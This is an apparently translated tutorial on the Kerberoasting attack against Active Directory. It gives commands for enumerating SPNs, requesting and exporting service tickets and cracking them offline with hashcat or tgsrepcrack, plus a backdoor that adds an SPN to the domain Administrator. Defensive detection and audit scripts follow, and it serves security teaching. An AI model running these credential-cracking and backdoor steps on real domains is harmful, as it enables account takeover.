0x00 Preface
---
Kerberoasting is a commonly used technique in domain penetration testing. This article draws on publicly available material and my own understanding to explain the principles and implementation of Kerberoasting and a related backdoor technique, and closes with defensive recommendations.
References:
http://www.harmj0y.net/blog/powershell/kerberoasting-without-mimikatz/
http://www.harmj0y.net/blog/redteaming/from-kekeo-to-rubeus/
https://malicious.link/post/2016/kerberoast-pt1/
https://malicious.link/post/2016/kerberoast-pt2/
https://malicious.link/post/2016/kerberoast-pt3/
https://adsecurity.org/?p=3458
https://adsecurity.org/?page_id=183
https://blog.netspi.com/faster-domain-escalation-using-ldap/
https://social.technet.microsoft.com/wiki/contents/articles/717.service-principal-names-spns-setspn-syntax-setspn-exe.aspx
0x01 Introduction
---
This article will cover the following topics:
- Kerberoasting related concepts
- Principles of Kerberoasting
- Implementation of Kerberoasting
- Backdoor exploitation in Kerberoasting
- Defense against Kerberoasting
0x02 Basic Concepts
---
SPN
Official documentation:
https://docs.microsoft.com/en-us/windows/desktop/AD/service-principal-names
Full name: Service Principal Names
An SPN is the unique identifier of a service instance running on a server; every service that uses Kerberos authentication must have an SPN registered.
There are two types of SPNs: one registered under machine accounts (Computers) in AD, and the other registered under domain user accounts (Users)
When a service runs under the Local System or Network Service account, the SPN is registered under the machine account (Computers).
When a service runs under a domain user account, the SPN is registered under the domain user account (Users).
SPN format
serviceclass/host:port/servicename
Explanation:
- serviceclass is the service type (service name); common examples are www, ldap, SMTP, DNS and HOST.
- host takes one of two forms, an FQDN or a NetBIOS name, e.g. server01.test.com or server01.
- If the service listens on its default port, the port number (port) can be omitted.
Querying SPN
Initiating an LDAP query to the domain controller is part of normal Kerberos ticket behavior, so SPN query operations are difficult to detect.
(1) Using SetSPN
A tool built into Windows 7 and Windows Server 2008.
View all SPNs in the current domain:
setspn.exe -q */*
View all SPNs in the test domain:
setspn.exe -T test -q */*
Example output:
CN=DC1,OU=Domain Controllers,DC=test,DC=com
Each line starting with CN= is an account's distinguished name, and the indented lines below it are the SPNs registered to that account.
For the output data above, the machine accounts (Computers) are:
- CN=DC1,OU=Domain Controllers,DC=test,DC=com
- CN=COMPUTER01,CN=Computers,DC=test,DC=com
Domain user accounts (Users) are:
- CN=krbtgt,CN=Users,DC=test,DC=com
- CN=MSSQL Service Admin,CN=Users,DC=test,DC=com
There are two SPNs registered under the domain user account (Users): kadmin/changepw and MSSQLSvc/DC1.test.com
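As an added example (not part of the original article), the following Python script parses output in the layout shown above, splits each SPN into its serviceclass/host:port/servicename parts, and keeps only the SPNs registered under user accounts. The sample output is constructed to match the accounts listed above. Classifying an account by its container (CN=Users versus CN=Computers or OU=Domain Controllers) follows the article's convention and is an assumption; in a real audit, check objectClass instead, since accounts can live in any OU.

```python
"""Parse `setspn -q */*`-style output and list the SPNs held by user accounts.

Added example: the sample output below is constructed to match the
account list in the article; it is not real setspn output.
"""
from dataclasses import dataclass
from typing import Dict, List, Optional, Tuple

# Constructed sample in the layout setspn prints: an account DN on its own
# line, followed by one indented line per SPN registered to that account.
SAMPLE_OUTPUT = """\
CN=DC1,OU=Domain Controllers,DC=test,DC=com
\tHOST/DC1.test.com
\tHOST/DC1
\tldap/DC1.test.com/test.com
CN=COMPUTER01,CN=Computers,DC=test,DC=com
\tHOST/COMPUTER01.test.com
\tHOST/COMPUTER01
CN=krbtgt,CN=Users,DC=test,DC=com
\tkadmin/changepw
CN=MSSQL Service Admin,CN=Users,DC=test,DC=com
\tMSSQLSvc/DC1.test.com:1433
Existing SPN found!
"""


@dataclass(frozen=True)
class SPN:
    serviceclass: str
    host: str
    port: Optional[str]        # kept as text: SQL named instances put an instance name here
    servicename: Optional[str]
    raw: str


def parse_spn(text: str) -> SPN:
    """Split serviceclass/host[:port][/servicename]; port and servicename are optional."""
    raw = text.strip()
    parts = raw.split("/", 2)
    if len(parts) < 2 or not parts[0] or not parts[1]:
        raise ValueError(f"not an SPN: {raw!r}")
    host, _, port = parts[1].partition(":")
    servicename = parts[2] if len(parts) == 3 else None
    return SPN(parts[0], host, port or None, servicename, raw)


# Assumption: containers that hold machine accounts in this lab layout.
MACHINE_CONTAINERS = ("CN=Computers,", "OU=Domain Controllers,")


def account_kind(dn: str) -> str:
    """'computer' or 'user', judged by the DN's container as the article does.
    A production audit should use objectClass rather than the container."""
    return "computer" if any(c in dn for c in MACHINE_CONTAINERS) else "user"


def parse_setspn_output(output: str) -> Dict[str, List[SPN]]:
    """Map each account DN to the SPNs listed under it; unrelated lines are ignored."""
    accounts: Dict[str, List[SPN]] = {}
    current: Optional[str] = None
    for line in output.splitlines():
        if not line.strip():
            continue
        if line[0].isspace():               # indented line: an SPN of the current account
            if current is None:
                raise ValueError("SPN line before any account DN")
            accounts[current].append(parse_spn(line))
        elif line.startswith("CN="):         # unindented DN: a new account
            current = line.strip()
            accounts.setdefault(current, [])
        # anything else, e.g. the trailing "Existing SPN found!", is skipped
    return accounts


def user_account_spns(output: str) -> List[Tuple[str, SPN]]:
    """The SPNs this article cares about: those registered under user accounts."""
    return [(dn, spn)
            for dn, spns in parse_setspn_output(output).items()
            if account_kind(dn) == "user"
            for spn in spns]


if __name__ == "__main__":
    for dn, spn in user_account_spns(SAMPLE_OUTPUT):
        print(f"{dn}: class={spn.serviceclass} host={spn.host} port={spn.port} name={spn.servicename}")
```

Running the script on the sample prints the two user-account SPNs, kadmin/changepw (krbtgt) and MSSQLSvc/DC1.test.com:1433 (MSSQL Service Admin), and skips the HOST and ldap SPNs of the two machine accounts.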
0x03 Principle of Kerberoasting
---
1. Kerberos Authentication Process
A simplified Kerberos authentication process is shown in the figure below, consisting of six messages:

1. as_request
2. as_reply
3. tgs_request
4. tgs_reply
5. ap_request
6. ap_reply
In step 4 (tgs_reply), the user receives a TGS (service ticket) that is encrypted with the NTLM hash of the target service instance's account, using the RC4-HMAC encryption algorithm.
From an exploitation perspective, once this TGS has been obtained, candidate passwords can be tried offline: for each guess, simulate the encryption process and compare the result with the captured TGS. A match means the guess is correct, yielding the plaintext password of the target service instance's account.
2. Windows systems obtain the mapping between services and service instance accounts through SPN queries.
Here is an example:
User a wants to access resources of the MySQL service. In step 4 (tgs_reply), the process is as follows:
(1) The Domain Controller queries the SPN of the MySQL service.
If the SPN is registered under a machine account (Computers), it will query the servicePrincipalName attribute of all machine accounts (Computers) to find the corresponding account.
If the SPN is registered under a domain user account (Users), it will query the servicePrincipalName attribute of all domain users (Users) to find the corresponding account.
(2) After finding the corresponding account, use the NTLM hash of that account to generate the TGS.
3. All hosts within the domain can query SPNs.
4. Any user within the domain can request a TGS from any service within the domain.
In summary, any host within the domain can query SPNs, request TGSs from all services within the domain, and then perform brute-force attacks on the obtained TGSs.
For the plaintext passwords obtained through cracking, only the passwords of domain user accounts (Users) are valuable, as machine account passwords cannot be used for remote connections.
Therefore, an efficient exploitation approach is as follows:
- Query SPNs to identify valuable SPNs, which must meet the following conditions:
  - The SPN is registered under a domain user account (Users)
  - The domain user account has high privileges
- Request the TGS
- Export the TGS
- Brute-force cracking
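The request pattern described above leaves a trace on the domain controller: every service ticket issued is logged as Windows Security event 4769 (Kerberos service ticket requested). The following Python script, an added example that is not part of the original article, runs two detection rules over constructed 4769 records: a successful RC4-HMAC ticket (TicketEncryptionType 0x17) for a user-account SPN, and one client address obtaining tickets for several distinct user-account services within a short window. The field names follow the 4769 EventData schema; the addresses, account names and service names are constructed.

```python
"""Two detection rules for the TGS request pattern, run over constructed
Windows Security event 4769 records. Added example, not the article's code.
"""
from collections import defaultdict
from datetime import datetime, timedelta
from typing import Dict, List

RC4_HMAC = "0x17"  # TicketEncryptionType value for RC4-HMAC service tickets


def ev(ts, user, service, etype, ip, status="0x0"):
    """One constructed 4769 record using the event's EventData field names."""
    return {"EventID": 4769, "TimeCreated": ts, "TargetUserName": user, "ServiceName": service,
            "TicketEncryptionType": etype, "IpAddress": ip, "Status": status}


# Constructed events: 192.168.1.20 obtains RC4 tickets for three user-account
# services within seconds; 192.168.1.30 is ordinary activity (one RC4 ticket
# for a legacy service, AES tickets otherwise); the last request failed.
EVENTS = [
    ev("2019-01-10T09:00:01Z", "user01@TEST.COM", "sqlsvc", "0x17", "::ffff:192.168.1.20"),
    ev("2019-01-10T09:00:02Z", "user01@TEST.COM", "Administrator", "0x17", "::ffff:192.168.1.20"),
    ev("2019-01-10T09:00:03Z", "user01@TEST.COM", "httpsvc", "0x17", "::ffff:192.168.1.20"),
    ev("2019-01-10T09:00:04Z", "user01@TEST.COM", "COMPUTER01$", "0x17", "::ffff:192.168.1.20"),
    ev("2019-01-10T09:05:00Z", "user02@TEST.COM", "sqlsvc", "0x17", "::ffff:192.168.1.30"),
    ev("2019-01-10T09:05:01Z", "user02@TEST.COM", "COMPUTER01$", "0x12", "::ffff:192.168.1.30"),
    ev("2019-01-10T09:05:02Z", "user02@TEST.COM", "krbtgt", "0x12", "::ffff:192.168.1.30"),
    ev("2019-01-10T09:06:00Z", "user03@TEST.COM", "sqlsvc", "0x17", "::ffff:192.168.1.40", status="0x7"),
]


def parse_ts(text: str) -> datetime:
    return datetime.strptime(text, "%Y-%m-%dT%H:%M:%SZ")


def is_user_service(name: str) -> bool:
    """Machine accounts end in '$'; krbtgt entries are TGT traffic, not service tickets."""
    return not name.endswith("$") and name.lower() != "krbtgt"


def successful(events: List[dict]) -> List[dict]:
    return [e for e in events if e["EventID"] == 4769 and e["Status"] == "0x0"]


def rc4_user_spn_requests(events: List[dict]) -> List[dict]:
    """Rule 1: an RC4 service ticket for a user-account SPN, the ticket type
    the offline cracking step depends on. Noisy on its own where legacy
    services still use RC4, so pair it with rule 2."""
    return [e for e in successful(events)
            if e["TicketEncryptionType"] == RC4_HMAC and is_user_service(e["ServiceName"])]


def burst_sources(events: List[dict], window: timedelta = timedelta(seconds=60),
                  threshold: int = 3) -> Dict[str, int]:
    """Rule 2: one client address obtaining tickets for at least `threshold`
    distinct user-account services inside `window`. Returns ip -> peak count."""
    by_ip: Dict[str, list] = defaultdict(list)
    for e in successful(events):
        if is_user_service(e["ServiceName"]):
            by_ip[e["IpAddress"]].append((parse_ts(e["TimeCreated"]), e["ServiceName"]))
    flagged: Dict[str, int] = {}
    for ip, reqs in by_ip.items():
        reqs.sort()
        for i, (t, _) in enumerate(reqs):
            # distinct services requested in the window ending at this event
            recent = {svc for ts, svc in reqs[:i + 1] if t - ts <= window}
            if len(recent) >= threshold:
                flagged[ip] = max(flagged.get(ip, 0), len(recent))
    return flagged


if __name__ == "__main__":
    for e in rc4_user_spn_requests(EVENTS):
        print(f"RC4 ticket for {e['ServiceName']} requested by {e['TargetUserName']} from {e['IpAddress']}")
    for ip, n in burst_sources(EVENTS).items():
        print(f"burst: {ip} obtained tickets for {n} distinct user-account services within 60s")
```

On the sample, rule 1 reports four RC4 tickets (three from 192.168.1.20 and the single legacy request from 192.168.1.30), while rule 2 flags only 192.168.1.20, which is the behaviour worth an alert; the failed request from 192.168.1.40 is ignored by both rules.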
0x04 Kerberoasting Implementation Method One
---
1. Obtain valuable SPNs
Must meet the following conditions:
- The SPN is registered under a domain user account (Users)
- Domain user accounts have high privileges
You can choose from the following three methods:
(1) Using the PowerShell Active Directory module
Note:
The PowerShell Active Directory module must be installed in advance; domain controllers typically have it installed
import-module ActiveDirectory
For systems without the Active Directory module installed, you can import the Active Directory module using the following command:
import-module .\Microsoft.ActiveDirectory.Management.dll
Microsoft.ActiveDirectory.Management.dll is generated after installing the PowerShell Active Directory module. I have extracted it and uploaded it to GitHub:
An open-source project
(2) Using PowerView
https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1
Get-NetUser -spn -AdminCount | Select name,whencreated,pwdlastset,lastlogon
(3) Using kerberoast
powershell:
https://github.com/nidem/kerberoast/blob/master/GetUserSPNs.ps1
vbs:
https://github.com/nidem/kerberoast/blob/master/GetUserSPNs.vbs
Parameters are as follows:
cscript GetUserSPNs.vbs
2. Request TGS
(1) Request specific TGS
$SPNName = 'MSSQLSvc/DC1.test.com'
(2) Request all TGS
Add-Type -AssemblyName System.IdentityModel
After execution, run klist to view the tickets in memory; the requested TGS will be listed among them.
3. Export
Using mimikatz
kerberos::list /export
4. Crack
https://github.com/nidem/kerberoast/blob/master/tgsrepcrack.py
./tgsrepcrack.py wordlist.txt test.kirbi
0x05 Kerberoasting Implementation Method Two
---
An automated implementation that does not require mimikatz and works with standard user privileges. Reference:
http://www.harmj0y.net/blog/powershell/kerberoasting-without-mimikatz/
Code repository:
https://github.com/EmpireProject/Empire/commit/6ee7e036607a62b0192daed46d3711afc65c3921
It uses System.IdentityModel.Tokens.KerberosRequestorSecurityToken to request the TGS and extracts the TGS from the returned result. The output can be cracked with John the Ripper or Hashcat.
Example demonstration:
Execute on a domain host with standard user privileges:
Invoke-Kerberoast -AdminCount -OutputFormat Hashcat | fl
The -AdminCount switch restricts the results to high-privilege users (accounts with adminCount set).
Output result as shown in the figure below

Parameter to extract only the hash is as follows:
Invoke-Kerberoast -AdminCount -OutputFormat Hashcat | Select hash | ConvertTo-CSV -NoTypeInformation
The output result is shown in the following figure

The parameters for cracking with hashcat are as follows:
hashcat -m 13100 /tmp/hash.txt /tmp/password.list -o found.txt --force
The cracking result is shown in the following figure, successfully obtaining the plaintext password MySQLAdmin111!

Note:
Rubeus can also achieve the functionality of Invoke-Kerberoast, with the address as follows:
https://github.com/GhostPack/Rubeus
The parameters are as follows:
Rubeus.exe kerberoast
0x06 Backdoor Exploitation of Kerberoasting
---
Once an attacker holds permission to modify SPNs, they can add an SPN to a chosen domain user. From then on they can obtain a TGS for that user at any time and, after cracking it, recover the plaintext password.
For example, to add SPN VNC/DC1.test.com for the domain user Administrator, the parameters are as follows:
setspn.exe -U -A VNC/DC1.test.com Administrator
As shown in the figure below

This SPN can then be seen from any host within the domain, and Kerberoast can be used to obtain the TGS, as shown below

Then use hashcat to crack it
Additional note:
The parameters to delete the SPN are as follows:
setspn.exe -D VNC/DC1.test.com Administrator
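The SPN change made with setspn above is written to the user object's servicePrincipalName attribute, and with Directory Service Changes auditing enabled (and a SACL on the object that audits Write Property) the domain controller records it as Security event 5136 (A directory service object was modified). The following Python script, an added example that is not part of the original article, flags servicePrincipalName additions and removals on user objects and raises the severity when the object is on a watchlist of privileged accounts. The events and the watchlist are constructed; the %%14674 and %%14675 codes are the Value Added and Value Deleted operation types this event uses.

```python
"""Flag servicePrincipalName changes on user objects in constructed Windows
Security event 5136 records. Added example, not the article's code.
"""
from typing import Dict, List, Set

VALUE_ADDED = "%%14674"    # 5136 OperationType: a value was added to the attribute
VALUE_DELETED = "%%14675"  # 5136 OperationType: a value was removed

# Assumed watchlist of privileged account DNs (constructed for the example).
PRIVILEGED_DNS: Set[str] = {"CN=Administrator,CN=Users,DC=test,DC=com"}


def ev(subject, obj_dn, obj_class, attribute, value, operation):
    """One constructed 5136 record using the event's EventData field names."""
    return {"EventID": 5136, "SubjectUserName": subject, "ObjectDN": obj_dn,
            "ObjectClass": obj_class, "AttributeLDAPDisplayName": attribute,
            "AttributeValue": value, "OperationType": operation}


# Constructed events: the SPN added to Administrator as in the article, routine
# computer SPN churn, an unrelated attribute change, and the SPN's later removal.
EVENTS = [
    ev("opsadmin", "CN=Administrator,CN=Users,DC=test,DC=com", "user",
       "servicePrincipalName", "VNC/DC1.test.com", VALUE_ADDED),
    ev("COMPUTER01$", "CN=COMPUTER01,CN=Computers,DC=test,DC=com", "computer",
       "servicePrincipalName", "HOST/COMPUTER01.test.com", VALUE_ADDED),
    ev("opsadmin", "CN=MSSQL Service Admin,CN=Users,DC=test,DC=com", "user",
       "description", "SQL service account", VALUE_ADDED),
    ev("opsadmin", "CN=Administrator,CN=Users,DC=test,DC=com", "user",
       "servicePrincipalName", "VNC/DC1.test.com", VALUE_DELETED),
]


def spn_changes(events: List[dict]) -> List[dict]:
    """All 5136 records that touch the servicePrincipalName attribute."""
    return [e for e in events
            if e["EventID"] == 5136 and e["AttributeLDAPDisplayName"] == "servicePrincipalName"]


def findings(events: List[dict], watchlist: Set[str] = PRIVILEGED_DNS) -> List[Dict[str, str]]:
    """SPN changes on user objects; computer objects are skipped because their
    SPNs change routinely (joins, renames). Watchlisted objects are 'high'."""
    out: List[Dict[str, str]] = []
    for e in spn_changes(events):
        if e["ObjectClass"] != "user":
            continue
        out.append({
            "severity": "high" if e["ObjectDN"] in watchlist else "medium",
            "action": "added" if e["OperationType"] == VALUE_ADDED else "removed",
            "object": e["ObjectDN"],
            "spn": e["AttributeValue"],
            "by": e["SubjectUserName"],
        })
    return out


if __name__ == "__main__":
    for f in findings(EVENTS):
        print(f"[{f['severity']}] SPN {f['spn']} {f['action']} on {f['object']} by {f['by']}")
```

On the sample, the two findings are the addition and the later removal of VNC/DC1.test.com on the Administrator object, both at high severity; the computer account's HOST SPN and the description change produce nothing. The removal is worth keeping as a finding because, as the article shows, the TGS only needs to be requested once while the SPN exists.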
0x07 Defense
---
From a defensive perspective, Kerberoasting cannot be prevented outright, but for SPNs with high attack value (those registered under domain user accounts with high privileges), longer passwords make cracking harder, and the associated domain user passwords should be changed regularly.
Administrators can run Invoke-Kerberoast on a host within the domain to check for dangerous SPNs.
Download link:
https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1
Parameters:
Get-NetUser -spn -AdminCount | Select name,whencreated,pwdlastset,lastlogon
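The query above lists the candidate accounts; the next step is deciding which to fix first. The following Python script, an added example that is not part of the original article, ranks user accounts that carry SPNs using the criteria from this section (registered under a user account, high privilege via adminCount, and password age) plus one check the article does not mention: whether the account's msDS-SupportedEncryptionTypes still permits RC4, since the cracking path above relies on RC4-HMAC tickets. The directory records are constructed; the attribute names are the real AD attribute names.

```python
"""Rank SPN-bearing user accounts by cracking risk. Added example with
constructed directory records, not the article's code.
"""
from datetime import date
from typing import List, Optional

# msDS-SupportedEncryptionTypes bit flags. 0 or absent means the DC default,
# which for user accounts still includes RC4 unless domain policy disables it.
RC4, AES128, AES256 = 0x4, 0x8, 0x10

AUDIT_DATE = date(2019, 2, 1)  # constructed "today" so the sample is reproducible


def rec(name, cls, spns, admin, pwd_last_set, enc):
    """One constructed directory record using the AD attribute names."""
    return {"sAMAccountName": name, "objectClass": cls, "servicePrincipalName": spns,
            "adminCount": admin, "pwdLastSet": pwd_last_set,
            "msDS-SupportedEncryptionTypes": enc}


ACCOUNTS = [
    rec("sqlsvc", "user", ["MSSQLSvc/DC1.test.com:1433"], 1, date(2016, 5, 1), 0),
    rec("websvc", "user", ["HTTP/web01.test.com"], 0, date(2019, 1, 2), AES128 | AES256),
    rec("COMPUTER01$", "computer", ["HOST/COMPUTER01.test.com"], 0, date(2019, 1, 1),
        RC4 | AES128 | AES256),
    rec("jdoe", "user", [], 0, date(2018, 6, 1), 0),
]


def rc4_allowed(enc: int) -> bool:
    """True when RC4 service tickets can still be issued for the account."""
    return enc == 0 or bool(enc & RC4)


def assess(account: dict, today: date, max_age_days: int = 365) -> Optional[dict]:
    """Score one account; None when it is not a user account with an SPN."""
    if account["objectClass"] != "user" or not account["servicePrincipalName"]:
        return None
    reasons = ["SPN registered under a user account"]
    if account["adminCount"] == 1:
        reasons.append("high privilege (adminCount=1)")
    age = (today - account["pwdLastSet"]).days
    if age > max_age_days:
        reasons.append(f"password last set {age} days ago")
    if rc4_allowed(account["msDS-SupportedEncryptionTypes"]):
        reasons.append("RC4 service tickets still allowed")
    return {"account": account["sAMAccountName"], "spns": account["servicePrincipalName"],
            "score": len(reasons), "reasons": reasons}


def audit(accounts: List[dict], today: date, max_age_days: int = 365) -> List[dict]:
    """Highest-risk accounts first; machine accounts and SPN-less users are dropped."""
    results = [r for r in (assess(a, today, max_age_days) for a in accounts) if r]
    return sorted(results, key=lambda r: r["score"], reverse=True)


def audit_sample() -> List[dict]:
    return audit(ACCOUNTS, AUDIT_DATE)


if __name__ == "__main__":
    for r in audit_sample():
        print(f"{r['account']} score={r['score']}: " + "; ".join(r["reasons"]))
```

On the sample, sqlsvc scores 4 (privileged, password nearly three years old, RC4 still allowed) and websvc scores 1, while the computer account and the SPN-less user are not listed at all, which matches the article's point that only user-account SPNs are worth the defender's attention. Note that moving an account to AES-only ticket encryption changes which hash the attacker has to crack but does not remove the need for a long, regularly rotated password.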
0x08 Summary
---
This article provides a detailed introduction to the principles, methods, and defenses of Kerberoasting, along with practical demonstrations.